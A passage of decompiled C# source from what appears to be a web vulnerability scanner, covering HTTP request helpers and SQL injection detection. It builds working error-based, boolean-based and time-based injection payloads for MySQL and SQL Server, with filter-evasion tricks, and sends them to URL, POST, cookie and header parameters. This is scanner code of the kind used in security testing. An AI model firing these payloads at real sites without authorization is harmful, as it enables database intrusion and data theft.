					enctype = webForm.enctype;
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(text, reqType, urlencodedPostData, enctype, customCookie, EscapeCookie, "", "");
				if (httpWebResponse == null)
				{
					responseUrl = text;
					return "";
				}
				Stream responseStream = ((WebResponse)httpWebResponse).GetResponseStream();
				StreamReader streamReader = new StreamReader(responseStream, WebEncoding);
				string result = streamReader.ReadToEnd();
				responseUrl = ((object)((WebResponse)httpWebResponse).get_ResponseUri()).ToString();
				streamReader.Close();
				responseStream.Close();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				return result;
			}
			catch
			{
				responseUrl = text;
				return "";
			}
		}

		public string GetSourceCodeWithEscapeSpaceOption(string URL, RequestType ReqType, bool needEscapeSpace, string enctype)
		{
			string text = URL;
			if (needEscapeSpace)
			{
				text = text.Replace("%20", "/**/").Replace(" ", "/**/").Replace("--/**/", "--%20");
			}
			return GetSourceCode(text, ReqType, enctype);
		}

		public string GetSourceCode(string URL, RequestType ReqType, string enctype)
		{
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				string urlencodedPostData = "";
				string customCookie = "";
				if (ReqType != 0)
				{
					int num = URL.IndexOf('^');
					if (num > 0)
					{
						string text = URL.Substring(num + 1);
						switch (ReqType)
						{
						case RequestType.POST:
							urlencodedPostData = text;
							break;
						case RequestType.COOKIE:
							customCookie = text;
							break;
						}
						URL = URL.Substring(0, num);
					}
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(URL, ReqType, urlencodedPostData, enctype, customCookie, EscapeCookie, "", "");
				try
				{
					if (httpWebResponse == null)
					{
						return "";
					}
					using Stream stream = ((WebResponse)httpWebResponse).GetResponseStream();
					using StreamReader streamReader = new StreamReader(stream, WebEncoding);
					if (streamReader == null)
					{
						return "";
					}
					string result = streamReader.ReadToEnd();
					((WebResponse)httpWebResponse).Close();
					stream.Close();
					streamReader.Close();
					return result;
				}
				finally
				{
					((IDisposable)httpWebResponse)?.Dispose();
				}
			}
			catch
			{
				return "";
			}
		}

		public string GetSourceCodeWithCookieOption(string URL, RequestType ReqType, bool escapeCookie)
		{
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				string urlencodedPostData = "";
				string customCookie = "";
				if (ReqType != 0)
				{
					int num = URL.IndexOf('^');
					string text = "";
					if (num > 0)
					{
						text = URL.Substring(num + 1);
						switch (ReqType)
						{
						case RequestType.POST:
							urlencodedPostData = text;
							break;
						case RequestType.COOKIE:
							customCookie = text;
							break;
						}
						URL = URL.Substring(0, num);
					}
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(URL, ReqType, urlencodedPostData, "", customCookie, escapeCookie, "", "");
				if (httpWebResponse == null)
				{
					return "";
				}
				Stream responseStream = ((WebResponse)httpWebResponse).GetResponseStream();
				StreamReader streamReader = new StreamReader(responseStream, WebEncoding);
				string result = streamReader.ReadToEnd();
				streamReader.Close();
				responseStream.Close();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				return result;
			}
			catch
			{
				return "";
			}
		}

		public string GetSourceCodeWithCustomHeader(string URL, RequestType ReqType, string customUA, string customReferer, string enctype)
		{
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				string urlencodedPostData = "";
				string customCookie = "";
				if (ReqType != 0)
				{
					int num = URL.IndexOf('^');
					string text = "";
					if (num > 0)
					{
						text = URL.Substring(num + 1);
						switch (ReqType)
						{
						case RequestType.POST:
							urlencodedPostData = text;
							break;
						case RequestType.COOKIE:
							customCookie = text;
							break;
						}
						URL = URL.Substring(0, num);
					}
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(URL, ReqType, urlencodedPostData, enctype, customCookie, EscapeCookie, customUA, customReferer);
				if (httpWebResponse == null)
				{
					return "";
				}
				Stream responseStream = ((WebResponse)httpWebResponse).GetResponseStream();
				StreamReader streamReader = new StreamReader(responseStream, WebEncoding);
				string result = streamReader.ReadToEnd();
				streamReader.Close();
				responseStream.Close();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				return result;
			}
			catch
			{
				return "";
			}
		}

		public string GetSourceCode(string URL, RequestType ReqType, Encoding CurrentEncoding, bool needEscapeSpace)
		{
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return "";
				}
				if (needEscapeSpace)
				{
					URL = URL.Replace("%20", "/**/").Replace(" ", "/**/").Replace("--/**/", "--%20");
				}
				string urlencodedPostData = "";
				string customCookie = "";
				if (ReqType != 0)
				{
					int num = URL.IndexOf('^');
					string text = URL.Substring(num + 1);
					switch (ReqType)
					{
					case RequestType.POST:
						urlencodedPostData = text;
						break;
					case RequestType.COOKIE:
						customCookie = text;
						break;
					}
					URL = URL.Substring(0, num);
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(URL, ReqType, urlencodedPostData, "", customCookie, EscapeCookie, "", "");
				Stream responseStream = ((WebResponse)httpWebResponse).GetResponseStream();
				StreamReader streamReader = new StreamReader(responseStream, CurrentEncoding);
				string result = streamReader.ReadToEnd();
				streamReader.Close();
				responseStream.Close();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				return result;
			}
			catch
			{
				return "";
			}
		}

		public string GetSourceCodeAndMilliSeconds(string URL, RequestType ReqType, out double respMilliSeconds, string enctype)
		{
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					respMilliSeconds = 0.0;
					return "";
				}
				DateTime now = DateTime.Now;
				string urlencodedPostData = "";
				string customCookie = "";
				if (ReqType != 0)
				{
					int num = URL.IndexOf('^');
					string text = URL.Substring(num + 1);
					switch (ReqType)
					{
					case RequestType.POST:
						urlencodedPostData = text;
						break;
					case RequestType.COOKIE:
						customCookie = text;
						break;
					}
					if (num > 0)
					{
						URL = URL.Substring(0, num);
					}
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(URL, ReqType, urlencodedPostData, enctype, customCookie, EscapeCookie, "", "");
				if (httpWebResponse == null)
				{
					respMilliSeconds = 0.0;
					return "";
				}
				Stream responseStream = ((WebResponse)httpWebResponse).GetResponseStream();
				StreamReader streamReader = new StreamReader(responseStream, WebEncoding);
				string result = streamReader.ReadToEnd();
				streamReader.Close();
				responseStream.Close();
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				respMilliSeconds = DateTime.Now.Subtract(now).TotalMilliseconds;
				return result;
			}
			catch
			{
				respMilliSeconds = 0.0;
				return "";
			}
		}

		public static string URL2NoParaURL(string sURL)
		{
			if (sURL.IndexOf('^') > 0)
			{
				string[] array = sURL.Split(new char[1]
				{
					'^'
				});
				sURL = array[0];
			}
			if (sURL.IndexOf('?') > 0)
			{
				string[] array2 = sURL.Split(new char[1]
				{
					'?'
				});
				sURL = array2[0];
			}
			return sURL.Trim();
		}

		public static string URL2ActualURL(string sURL)
		{
			string result = sURL;
			int num = sURL.IndexOf('^');
			if (num > 0)
			{
				result = sURL.Substring(0, num);
			}
			return result;
		}

		public bool IsScannedParameter(string URLPara)
		{
			try
			{
				for (int i = 0; i < ScannedParameter.Count; i++)
				{
					if (URLPara.Equals(ScannedParameter[i]))
					{
						return true;
					}
				}
				return false;
			}
			catch (Exception)
			{
				return false;
			}
		}

		public string GetCookieStrFromCC(Uri uri)
		{
			//IL_0038: Unknown result type (might be due to invalid IL or missing references)
			//IL_003e: Expected O, but got Unknown
			try
			{
				if (uri == (Uri)null)
				{
					return "";
				}
				CookieCollection cookies = cc.GetCookies(uri);
				string text = "";
				foreach (Cookie item in cookies)
				{
					Cookie val = item;
					if (!string.IsNullOrEmpty(text))
					{
						text += "; ";
					}
					text = ((!EscapeCookie) ? (text + GlobalObject.unescape((object)(val.get_Name() + "=" + val.get_Value()))) : (text + val.get_Name() + "=" + val.get_Value()));
				}
				return text;
			}
			catch (Exception)
			{
				return "";
			}
		}

		public string GetCookieDetailsFromCC(Uri uri)
		{
			//IL_0027: Unknown result type (might be due to invalid IL or missing references)
			//IL_002d: Expected O, but got Unknown
			try
			{
				CookieCollection cookies = cc.GetCookies(uri);
				string text = "";
				foreach (Cookie item in cookies)
				{
					Cookie val = item;
					string text2 = val.get_Name() + "=" + val.get_Value() + "; Path=" + val.get_Path() + "; Domain=" + val.get_Domain();
					if (val.get_Secure())
					{
						text2 += "; Secure";
					}
					if (val.get_HttpOnly())
					{
						text2 += "; HttpOnly";
					}
					if (!string.IsNullOrEmpty(text))
					{
						text += "\r\n";
					}
					text += text2;
				}
				return text;
			}
			catch (Exception)
			{
				return "";
			}
		}

		public static string GetKeyWordBySource(string Source1, string Source2)
		{
			//IL_0005: Unknown result type (might be due to invalid IL or missing references)
			//IL_000b: Expected O, but got Unknown
			Regex val = new Regex("[^a-zA-Z0-9_\\x25\\x2f\\x2b\\x2d\\.\\u0080-\\uFFFF]+");
			string[] array = val.Split(Source1);
			string result = "";
			int length = Source1.Length;
			for (int i = 0; i < array.Length; i++)
			{
				string text = array[i];
				if (!string.IsNullOrEmpty(text) && (length <= 400 || !Regex.IsMatch(text, "^\\d+$")) && (Regex.IsMatch(text, "^\\d+$") || Regex.IsMatch(text, "^[A-Z]+$") || Regex.IsMatch(text, "^[A-Z\\x2f]?[a-z_\\-]+$") || Regex.IsMatch(text, "[\\u0080-\\uFFFF]+")) && Source2.IndexOf(text) < 0)
				{
					result = array[i];
					break;
				}
			}
			return result;
		}

		public static string FindDiffWordBySource(string Source1, string Source2)
		{
			//IL_0007: Unknown result type (might be due to invalid IL or missing references)
			//IL_000d: Expected O, but got Unknown
			//IL_0048: Unknown result type (might be due to invalid IL or missing references)
			//IL_004e: Expected O, but got Unknown
			Regex val = new Regex("<[^>]+>", (RegexOptions)18);
			Source1 = val.Replace(Source1, " ");
			Source2 = val.Replace(Source2, " ");
			string text;
			string text2;
			if (Source1.Length >= Source2.Length)
			{
				text = Source1;
				text2 = Source2;
			}
			else
			{
				text = Source2;
				text2 = Source1;
			}
			val = new Regex("[^a-zA-Z0-9\\u0080-\\uFFFF]+", (RegexOptions)18);
			string[] array = val.Split(text);
			string result = "";
			for (int i = 0; i < array.Length; i++)
			{
				if (text2.IndexOf(array[i]) < 0)
				{
					result = array[i];
					break;
				}
			}
			return result;
		}

		public VulnSQLInjection GetTimeBasedSQLInjection(string sURL, RequestType ReqType, ParameterType paramType, string LogicOperator, bool EscapeSpace, string currentParaName, string refPage, string prefix, string postfix, bool testEscapeSpace, DBType testDBType, string enctype)
		{
			//IL_0013: Unknown result type (might be due to invalid IL or missing references)
			//IL_001d: Expected O, but got Unknown
			string cookieStr = "";
			string pathFromURL = GetPathFromURL(sURL);
			try
			{
				if (ReqType == RequestType.COOKIE)
				{
					cookieStr = GetCookieStrFromCC(new Uri(pathFromURL));
				}
				string text = "";
				string text2 = "";
				if (!WCRSetting.ScanSQLInjection)
				{
					return null;
				}
				if (ReqType == RequestType.GET && !WCRSetting.ScanURLSQL)
				{
					return null;
				}
				if (ReqType == RequestType.POST && !WCRSetting.ScanPostSQL)
				{
					return null;
				}
				if (ReqType == RequestType.COOKIE && !WCRSetting.ScanCookieSQL)
				{
					return null;
				}
				if (testDBType == DBType.MySQL)
				{
					text = sURL + prefix + LogicOperator + " if(length(0x574352575653)>1" + postfix;
					text2 = sURL + prefix + LogicOperator + " if(length(0x574352575653)<1" + postfix;
					if (EscapeSpace)
					{
						text = text.Replace("%20", "/**/");
						text2 = text2.Replace("%20", "/**/");
					}
					double respMilliSeconds;
					string sourceCodeAndMilliSeconds = GetSourceCodeAndMilliSeconds(text, ReqType, out respMilliSeconds, enctype);
					GetSourceCodeAndMilliSeconds(text2, ReqType, out var respMilliSeconds2, enctype);
					if (string.IsNullOrEmpty(sourceCodeAndMilliSeconds))
					{
						DebugLog(ReqType.ToString() + "  " + text + "  " + paramType.ToString() + " Null");
						return null;
					}
					double num = respMilliSeconds - respMilliSeconds2;
					if (respMilliSeconds > 2999.0 && respMilliSeconds2 < 100.0 && num > 2800.0)
					{
						string pocUrlString = text;
						string description = ReqType.ToString() + " SQL INJECTION TimeBased " + paramType;
						VulnSQLInjection vulnSQLInjection = new VulnSQLInjection(ReqType, sURL, refPage, currentParaName, InjectMethod.TimeBased, paramType, "[[NULL]]", description, LogicOperator, prefix, postfix, pocUrlString, testDBType, "", 0, testEscapeSpace);
						vulnSQLInjection.vulnDatabaseType = testDBType;
						_DatabaseType = testDBType;
						vulnSQLInjection.shouldSource1EqualsSource0 = false;
						vulnSQLInjection.vulnPostEncType = enctype;
						vulnSQLInjection.t0InMs = respMilliSeconds2;
						return vulnSQLInjection;
					}
					return null;
				}
				return null;
			}
			catch
			{
				return null;
			}
			finally
			{
				if (ReqType == RequestType.COOKIE)
				{
					SetCookie(pathFromURL, cookieStr, isClear: false);
				}
			}
		}

		public static string RemoveTestInput(string Expression)
		{
			return Expression.Replace("!S!", "").Replace("!E!", "");
		}

		private VulnSQLInjection GetBooleanBasedSQLInjectionVuln(string testURL, RequestType testReqType, ParameterType InjType, string logicOperator, bool testEscapeSpace, string currentParaName, string Source0, string refPage, string prefix, string postfix, InjectMethod injMethod, DBType testDBType, bool needSource1EqualToSource0, string enctype)
		{
			//IL_0019: Unknown result type (might be due to invalid IL or missing references)
			//IL_0023: Expected O, but got Unknown
			//IL_023b: Unknown result type (might be due to invalid IL or missing references)
			//IL_0245: Invalid comparison between Unknown and I4
			if (InjType == ParameterType.NotInjectable)
			{
				return null;
			}
			string cookieStr = "";
			string text = URL2NoParaURL(testURL);
			try
			{
				if (testReqType == RequestType.COOKIE)
				{
					cookieStr = GetCookieStrFromCC(new Uri(text));
				}
				string text2 = "";
				string text3 = "";
				if (!WCRSetting.ScanSQLInjection)
				{
					return null;
				}
				if (testReqType == RequestType.GET && !WCRSetting.ScanURLSQL)
				{
					return null;
				}
				if (testReqType == RequestType.POST && !WCRSetting.ScanPostSQL)
				{
					return null;
				}
				if (testReqType == RequestType.COOKIE && !WCRSetting.ScanCookieSQL)
				{
					return null;
				}
				string text4 = GenerateRandomIntegerString();
				string text5 = GenerateRandomIntegerString();
				text2 = testURL + prefix + logicOperator + " " + text4 + "=" + text4 + postfix;
				text3 = testURL + prefix + logicOperator + " " + text4 + "=" + text5 + postfix;
				if (testEscapeSpace)
				{
					text2 = text2.Replace("%20", "/**/").Replace(" ", "/**/").Replace("--/**/", "--%20");
					text3 = text3.Replace("%20", "/**/").Replace(" ", "/**/").Replace("--/**/", "--%20");
				}
				string urlencodedPostData = "";
				string customCookie = "";
				string pocUrlString = text2;
				if (testReqType != 0)
				{
					int num = text2.IndexOf('^');
					string text6 = text2.Substring(num + 1);
					switch (testReqType)
					{
					case RequestType.POST:
						urlencodedPostData = text6;
						break;
					case RequestType.COOKIE:
						customCookie = text6;
						break;
					}
					if (num > 0)
					{
						text2 = text2.Substring(0, num);
					}
				}
				HttpWebResponse httpWebResponse = GetHttpWebResponse(text2, testReqType, urlencodedPostData, enctype, customCookie, EscapeCookie, "", "");
				if (httpWebResponse == null)
				{
					DebugLog(testReqType.ToString() + "  " + testURL + "  " + InjType.ToString() + " URL1 Null");
					return null;
				}
				if ((int)httpWebResponse.get_StatusCode() != 200)
				{
					DebugLog(testReqType.ToString() + "  " + testURL + "  " + InjType.ToString() + " URL1 StatusCode!=OK");
					return null;
				}
				((object)((WebResponse)httpWebResponse).get_ResponseUri()).ToString();
				string sourceCodeFromHttpWebResponse = GetSourceCodeFromHttpWebResponse(httpWebResponse);
				((WebResponse)httpWebResponse).Close();
				httpWebResponse = null;
				if (string.IsNullOrEmpty(sourceCodeFromHttpWebResponse))
				{
					DebugLog(testReqType.ToString() + "  " + testURL + "  " + InjType.ToString() + " KeyWord Null");
					return null;
				}
				logicOperator.ToLower();
				if (needSource1EqualToSource0)
				{
					string keyWordBySource = GetKeyWordBySource(Source0, sourceCodeFromHttpWebResponse);
					if (!string.IsNullOrEmpty(keyWordBySource))
					{
						return null;
					}
				}
				string sourceCode = GetSourceCode(text3, testReqType, enctype);
				string keyWordBySource2 = GetKeyWordBySource(sourceCodeFromHttpWebResponse, sourceCode);
				DebugLog(testReqType.ToString() + "  " + testURL + "  " + InjType.ToString() + " KeyWord=" + keyWordBySource2);
				if (!string.IsNullOrEmpty(keyWordBySource2))
				{
					string str = testReqType.ToString() + " SQL INJECTION";
					str = str + " BooleanBased " + InjType;
					VulnSQLInjection vulnSQLInjection = new VulnSQLInjection(testReqType, testURL, refPage, currentParaName, injMethod, InjType, keyWordBySource2, str, logicOperator, prefix, postfix, pocUrlString, testDBType, "", 0, testEscapeSpace);
					vulnSQLInjection.shouldSource1EqualsSource0 = needSource1EqualToSource0;
					vulnSQLInjection.vulnPostEncType = enctype;
					delegateLog("Found BooleanBased SQL Injection Vuln: " + vulnSQLInjection.vulnPocUrlString);
					return vulnSQLInjection;
				}
				return null;
			}
			catch
			{
				return null;
			}
			finally
			{
				if (testReqType == RequestType.COOKIE)
				{
					SetCookie(text, cookieStr, isClear: false);
				}
			}
		}

		private VulnSQLInjection GetErrorBasedSQLInjectionVuln(RequestType reqType, string testURL, ParameterType paramType, string refPage, string currentParaName, bool testEscapeSpace, string prefix, string postfix, DBType dbType, string regExpression, int maxLength, InjectMethod testInjMethod, string enctype)
		{
			//IL_00f7: Unknown result type (might be due to invalid IL or missing references)
			//IL_00fe: Expected O, but got Unknown
			if (reqType == RequestType.GET && !WCRSetting.ScanURLSQL)
			{
				return null;
			}
			if (reqType == RequestType.POST && !WCRSetting.ScanPostSQL)
			{
				return null;
			}
			if (reqType == RequestType.COOKIE && !WCRSetting.ScanCookieSQL)
			{
				return null;
			}
			bool isSQLServerDetect = ((dbType == DBType.SQLServer) ? true : false);
			string text = "";
			string customUA = "";
			string customReferer = "";
			switch (testInjMethod)
			{
			case InjectMethod.ErrorBased:
				text = testURL + prefix + EscapeSingleQuotes("WCRWVS", dbType, isSQLServerDetect) + postfix;
				break;
			case InjectMethod.ErrorBasedUserAgent:
				text = testURL;
				customUA = "WebCruiser" + prefix + EscapeSingleQuotes("WCRWVS", dbType, isSQLServerDetect) + postfix;
				break;
			case InjectMethod.ErrorBasedReferer:
				text = testURL;
				customReferer = URL2NoParaURL(testURL) + prefix + EscapeSingleQuotes("WCRWVS", dbType, isSQLServerDetect) + postfix;
				break;
			}
			if (testEscapeSpace)
			{
				text = text.Replace("%20", "/**/").Replace(" ", "/**/").Replace("--/**/", "--%20");
			}
			string text2 = "";
			text2 = GetSourceCodeWithCustomHeader(text, reqType, customUA, customReferer, enctype);
			Regex val = new Regex(regExpression, (RegexOptions)1);
			string value = ((Capture)val.Match(text2)).get_Value();
			if (value.Equals("WCRWVS", StringComparison.OrdinalIgnoreCase))
			{
				_DatabaseType = dbType;
				string description = reqType.ToString() + " SQL INJECTION " + testInjMethod.ToString() + " " + paramType;
				VulnSQLInjection vulnSQLInjection = new VulnSQLInjection(reqType, testURL, refPage, currentParaName, testInjMethod, paramType, "[[NULL]]", description, " ", prefix, postfix, text, dbType, regExpression, maxLength, testEscapeSpace);
				vulnSQLInjection.shouldSource1EqualsSource0 = false;
				vulnSQLInjection.vulnPostEncType = enctype;
				delegateLog("Found " + testInjMethod.ToString() + " SQL Injection Vuln: " + vulnSQLInjection.vulnPocUrlString);
				return vulnSQLInjection;
			}
			return null;
		}

		public VulnSQLInjection[] GetSQLInjectionVulnCollection(string sURL, RequestType ReqType, string refPage, bool skipScanned, bool testEscapeSpace, string enctype)
		{
			List<VulnSQLInjection> list = new List<VulnSQLInjection>();
			string sourceCode = GetSourceCode(sURL, ReqType, enctype);
			Thread.Sleep(300);
			string sourceCode2 = GetSourceCode(sURL, ReqType, enctype);
			if (!string.IsNullOrEmpty(GetKeyWordBySource(sourceCode, sourceCode2)))
			{
				DebugLog("Potential False Positive, return.");
				return list.ToArray();
			}
			if (testEscapeSpace)
			{
				delegateLog("Checking replace %20 by /**/ : " + sURL);
			}
			int num = ((ReqType != 0) ? sURL.LastIndexOf('^') : sURL.LastIndexOf('?'));
			string text = sURL.Substring(0, num);
			string text2 = sURL.Substring(num + 1);
			if (string.IsNullOrEmpty(text2))
			{
				return list.ToArray();
			}
			string[] array = text2.Split(new char[1]
			{
				'&'
			});
			for (int i = 0; i < array.Length; i++)
			{
				int num2 = array[i].IndexOf('#');
				if (num2 > 0)
				{
					array[i] = array[i].Substring(0, num2);
				}
			}
			for (int j = 0; j < array.Length; j++)
			{
				if (string.IsNullOrEmpty(array[j]))
				{
					continue;
				}
				string[] array2 = array[j].Split(new char[1]
				{
					'='
				});
				string text3 = array2[0];
				if (text3.IndexOf("csrf", StringComparison.OrdinalIgnoreCase) >= 0 || text3.IndexOf("token", StringComparison.OrdinalIgnoreCase) >= 0 || text3.IndexOf("session", StringComparison.OrdinalIgnoreCase) >= 0 || text3.IndexOf("submit", StringComparison.OrdinalIgnoreCase) >= 0 || array2.Length < 2)
				{
					continue;
				}
				string text4 = array2[1];
				if (Regex.IsMatch(text4, "^(file:/|[c-z]:|/)", (RegexOptions)1) || Regex.IsMatch(text4, "\\.\\w{1,4}$", (RegexOptions)1))
				{
					continue;
				}
				string text5 = "";
				for (int k = 0; k < j; k++)
				{
					if (!string.IsNullOrEmpty(text5))
					{
						text5 += "&";
					}
					text5 += array[k];
				}
				for (int l = j + 1; l < array.Length; l++)
				{
					if (!string.IsNullOrEmpty(text5))
					{
						text5 += "&";
					}
					text5 += array[l];
				}
				string text6 = URL2NoParaURL(sURL) + "^" + text3.ToLower() + "^InjectionWithEscape" + testEscapeSpace;
				if (skipScanned && IsScannedParameter(text6))
				{
					continue;
				}
				ScannedParameter.Add(text6);
				if (!string.IsNullOrEmpty(text5))
				{
					text5 += "&";
				}
				string text7 = "";
				string text8 = "?";
				if (ReqType != 0)
				{
					text8 = "^";
				}
				RequestType testReqType = ReqType;
				string text9 = "";
				string text10 = " ";
				string text11 = " ";
				string regExpression = "";
				delegateLog("Checking SQL Injection, ErrorBased, Parameter: " + text3);
				bool flag = false;
				VulnSQLInjection errorBasedSQLInjectionVuln;
				if (Regex.IsMatch(text4, "^[\\d\\-]+$"))
				{
					if (_DatabaseType == DBType.UnKnown || _DatabaseType == DBType.MySQL)
					{
						text10 = " or (select 1 from (select count(*),concat((";
						text11 = "),0x5E,floor(rand(0)*2)) x from information_schema.tables group by x)a)";
						regExpression = "(?<=\\x27)[^\\x27]+(?=\\x5E[01]\\x27)";
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, text7, ParameterType.Integer, refPage, text3, testEscapeSpace, text10, text11, DBType.MySQL, regExpression, 62, InjectMethod.ErrorBased, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
						else
						{
							text10 = " oR updatexml(1,concat(0x5e,(";
							text11 = ")),0)";
							regExpression = "(?<=\\x27\\x5E)[^\\x27]+(?=\\x27)";
							text7 = text + text8 + text5 + array[j];
							errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, text7, ParameterType.Integer, refPage, text3, testEscapeSpace, text10, text11, DBType.MySQL, regExpression, 31, InjectMethod.ErrorBased, enctype);
							if (errorBasedSQLInjectionVuln != null)
							{
								flag = true;
								list.Add(errorBasedSQLInjectionVuln);
							}
						}
					}
					if (_DatabaseType == DBType.UnKnown || _DatabaseType == DBType.SQLServer)
					{
						text10 = " aNd (char(94)%2B(";
						text11 = ")%2Bchar(94))>0";
						regExpression = "(?<=\\x27\\x5E)[\\s\\S]+(?=\\x5E\\x27)";
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, text7, ParameterType.Integer, refPage, text3, testEscapeSpace, text10, text11, DBType.SQLServer, regExpression, 0, InjectMethod.ErrorBased, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
					}
				}
				if (!flag)
				{
					if (_DatabaseType == DBType.UnKnown || _DatabaseType == DBType.MySQL)
					{
						text10 = "%27 or (select 1 from (select count(*),concat((";
						text11 = "),0x5E,floor(rand(0)*2)) x from information_schema.tables group by x)a) or %27";
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, text7, ParameterType.String, refPage, text3, testEscapeSpace, text10, text11, DBType.MySQL, "(?<=\\x27)[^\\x27]+(?=\\x5E[01]\\x27)", 62, InjectMethod.ErrorBased, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
						else
						{
							string[,] array3 = new string[4, 2]
							{
								{
									"%27 oR updatexml(1,concat(0x5e,(",
									")),0) oR %27"
								},
								{
									"%27) oR updatexml(1,concat(0x5e,(",
									")),0) oR (%27"
								},
								{
									"%22 oR updatexml(1,concat(0x5e,(",
									")),0) oR %22"
								},
								{
									"%22) oR updatexml(1,concat(0x5e,(",
									")),0) oR (%22"
								}
							};
							int length = array3.GetLength(0);
							for (int m = 0; m < length; m++)
							{
								text10 = array3[m, 0];
								text11 = array3[m, 1];
								regExpression = "(?<=\\x27\\x5E)[^\\x27]+(?=\\x27)";
								text7 = text + text8 + text5 + array[j];
								errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, text7, ParameterType.String, refPage, text3, testEscapeSpace, text10, text11, DBType.MySQL, regExpression, 31, InjectMethod.ErrorBased, enctype);
								if (errorBasedSQLInjectionVuln != null)
								{
									flag = true;
									list.Add(errorBasedSQLInjectionVuln);
									break;
								}
							}
							if (!flag)
							{
								string value = ((Capture)Regex.Match(sURL, "(?<=[\\?\\^&])[^&]*(user|name|uid|userid)[^&]*(?=\\=\\d{7})", (RegexOptions)1)).get_Value();
								string testURL = Regex.Replace(text7, value + "\\=\\d{7}", value + "=admin", (RegexOptions)1);
								errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, testURL, ParameterType.String, refPage, text3, testEscapeSpace, text10, text11, DBType.MySQL, regExpression, 31, InjectMethod.ErrorBased, enctype);
								if (errorBasedSQLInjectionVuln != null)
								{
									flag = true;
									list.Add(errorBasedSQLInjectionVuln);
								}
							}
						}
					}
					if (_DatabaseType == DBType.UnKnown || _DatabaseType == DBType.SQLServer)
					{
						text10 = "%27 aNd (char(94)%2B(";
						text11 = ")%2Bchar(94))>0 and '9635'='9635";
						regExpression = "(?<=\\x27\\x5E)[\\s\\S]+(?=\\x5E\\x27)";
						text7 = text + text8 + text5 + array[j];
						errorBasedSQLInjectionVuln = GetErrorBasedSQLInjectionVuln(ReqType, text7, ParameterType.String, refPage, text3, testEscapeSpace, text10, text11, DBType.SQLServer, regExpression, 0, InjectMethod.ErrorBased, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
					}
				}
				delegateLog("Checking SQL Injection, BooleanBased, Parameter: " + text3);
				flag = false;
				InjectMethod injMethod;
				ParameterType injType;
				if (Regex.IsMatch(text4, "^[\\d\\-]+$"))
				{
					injType = ParameterType.Integer;
					text7 = text + text8 + text5 + array[j];
					text10 = " ";
					text9 = "aNd";
					text11 = " aNd 7193=7193";
					injMethod = InjectMethod.ToBeDetect;
					errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: true, enctype);
					if (errorBasedSQLInjectionVuln != null)
					{
						flag = true;
						list.Add(errorBasedSQLInjectionVuln);
					}
					else
					{
						text7 = text + text8 + text5 + text3 + "=99999999";
						text9 = "oR";
						errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, ReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: false, enctype);
						if (errorBasedSQLInjectionVuln != null)
						{
							flag = true;
							list.Add(errorBasedSQLInjectionVuln);
						}
						else
						{
							text11 = "--%20";
							errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: false, enctype);
							if (errorBasedSQLInjectionVuln != null)
							{
								flag = true;
								list.Add(errorBasedSQLInjectionVuln);
							}
							else if (ReqType == RequestType.GET && WCRSetting.ScanCookieSQL)
							{
								testReqType = RequestType.COOKIE;
								text9 = "aNd";
								text7 = text + text8 + text5 + "^" + array[j];
								errorBasedSQLInjectionVuln = GetBooleanBasedSQLInjectionVuln(text7, testReqType, injType, text9, testEscapeSpace, text3, sourceCode, refPage, text10, text11, injMethod, _DatabaseType, needSource1EqualToSource0: true, enctype);
								if (errorBasedSQLInjectionVuln != null)
								{
									flag = true;
									list.Add(errorBasedSQLInjectionVuln);
								}
								SetSingleCookie(sURL, text3 + "=1", "", EscapeCookie, isExpired: true);
							}
						}
					}
				}
				if (!flag)
				{
					injType = ParameterType.String;
					testReqType = ReqType;
					string[,] array4 = new string[4, 2]
					{
						{
							"%27 ",
							" aNd %276199%27=%276199"
						},
						{
							"%27) ",
							" aNd (%276199%27)=(%276199"
						},
						{
							"%22 ",
							" aNd %226199%22=%226199"
						},
						{
							"%22) ",
							" aNd (%226199%22)=(%226199"
						}
					};
					int length2 = array4.GetLength(0);
					for (int n = 0; n < length2; n++)
					{
						text10 = array4[n, 0];
						text9 = "aNd";
						text11 = array4[n, 1];
						injMethod = InjectMethod.ToBeDetect;
						text7 = text + text8 + text5 + array[j];
